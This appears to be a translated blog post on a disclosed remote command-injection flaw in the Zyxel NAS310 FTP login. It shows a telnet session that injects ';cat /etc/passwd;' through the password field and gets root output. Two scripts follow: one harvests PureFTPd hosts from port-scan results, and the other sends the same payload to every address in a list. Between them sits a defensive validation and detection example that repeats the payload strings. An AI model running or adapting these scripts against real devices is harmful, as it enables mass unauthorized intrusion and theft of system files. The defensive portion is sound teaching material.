Overview
The Zyxel NAS310 is a device with data-storage capability, so it is also called "network attached storage". It is a dedicated data storage server: data-centric, it separates storage from the server entirely and manages data centrally, which frees bandwidth, improves performance, lowers total cost of ownership and protects investment. Its cost is far lower than storing data on a server, while its efficiency is far higher.
A foreign security researcher disclosed a remote command execution vulnerability in the Zyxel NAS310 (https://blogs.securiteam.com/index.php/archives/2694 ). The NAS310 does not effectively filter the parameters passed in during FTP login, so an attacker can inject system commands that are executed, and they run with the highest privilege, root.
1. Test:
$ telnet 192.168.219.101 21
Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220 Welcome to PureFTPd [TLS]
220 You are user number 1 of 10 allowed.
220 Local time is now 22:46. Server port: 21.
220 This is a private system No anonymous login
220 IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';cat /etc/passwd;
root:x:0:0:root:/root:/bin/sh
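The root cause described above is a login value that reaches a shell unfiltered. The following Python 3 code is an added example, not part of the original write-up or of Zyxel's firmware: it shows the allow-list validation and argv-based process call that would have closed the hole, and a small detector that flags USER/PASS commands carrying shell metacharacters in a captured FTP control channel. The sample lines, the 32-character allow-list and the use of `id` as the downstream command are assumptions made for the example.

```python
import re
import subprocess

# Allow-list for FTP account names (assumption for this example: letters, digits, '.', '_', '-').
SAFE_USERNAME = re.compile(r'^[A-Za-z0-9._-]{1,32}$')
# Characters that let a value break out of a shell command string.
SHELL_META = re.compile(r'[;&|`$\'"\\<>(){}\n\r]')

# Constructed FTP control-channel capture mirroring the session above (not real traffic).
SAMPLE_FTP_LINES = [
    "USER alice",
    "PASS s3cret-pass",
    "user '",
    "pass ';cat /etc/passwd;",
    "USER bob`id`",
]


def is_safe_username(name):
    """True only if the name matches the strict allow-list."""
    return bool(SAFE_USERNAME.match(name))


def flag_login_commands(lines):
    """Return (verb, argument) pairs for USER/PASS commands whose argument
    carries shell metacharacters; these are the lines a defender should alert on."""
    hits = []
    for line in lines:
        m = re.match(r'^(USER|PASS)\s+(.*)$', line.rstrip('\r\n'), re.IGNORECASE)
        if m and SHELL_META.search(m.group(2)):
            hits.append((m.group(1).upper(), m.group(2)))
    return hits


def vulnerable_command(name):
    """The unsafe pattern: the raw login name is concatenated into a shell string.
    A shell reads ';cat /etc/passwd;' as a second command, which is exactly the bug above."""
    return "id " + name


def lookup_account_safely(name):
    """Hardened form: validate first, then pass an argv list so no shell ever parses the value.
    The downstream command 'id' is an assumed stand-in for whatever the server really runs."""
    if not is_safe_username(name):
        raise ValueError("rejected login name: %r" % name)
    proc = subprocess.run(['id', name], capture_output=True, text=True)
    return proc.returncode == 0


def is_rejected(name):
    """True if the hardened lookup refuses the value before any process is started."""
    try:
        lookup_account_safely(name)
    except ValueError:
        return True
    return False


if __name__ == '__main__':
    for verb, arg in flag_login_commands(SAMPLE_FTP_LINES):
        print("suspicious %s argument: %r" % (verb, arg))
    print("unsafe shell string would be:", repr(vulnerable_command("';cat /etc/passwd;")))
    print("hardened lookup rejects it:", is_rejected("';cat /etc/passwd;"))
```

The detector is deliberately broad: a quote or semicolon in a login name is almost never legitimate, so the false-positive cost is low, and it catches the exact strings used in the session above without needing a signature for each payload.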
2. Extract from the port-scanner results the IPs whose banner contains PureFTPd
#!/usr/bin/env python
# encoding: utf-8
import os
from fileutils import FileUtils
import re

for line in FileUtils.getLines('result.txt'):
    if re.search(r'Welcome to PureFTPd', line):
        ip = re.search(r'\d+\.\d+\.\d+\.\d+', line)
        print ip.group()
        fp = open('filter.txt', 'a')
        fp.write(ip.group() + '\n')
        fp.close()
    else:
        pass
3. Test script
#!/usr/bin/env python
# encoding: utf-8
import sys
import os
from fileutils import FileUtils
import telnetlib

# The same two login values used in the manual session above
username = 'user \''
password = 'pass \';cat /etc/passwd;'

def verify(Host):
    print Host
    global tn
    try:
        tn = telnetlib.Telnet(Host, port=21, timeout=5)
        tn.set_debuglevel(2)
    except Exception, e:
        # Connection failed, so there is no socket to close
        return
    if tn.read_until('220 You will be disconnected', timeout=3):
        tn.write(username + '\r\n')
    else:
        tn.close()
        return
    if tn.read_until('OK. Password required', timeout=3):
        tn.write(password + '\r\n')
    tn.close()

if __name__ == '__main__':
    for host in FileUtils.getLines('ip.lst'):
        verify(host)
Test results: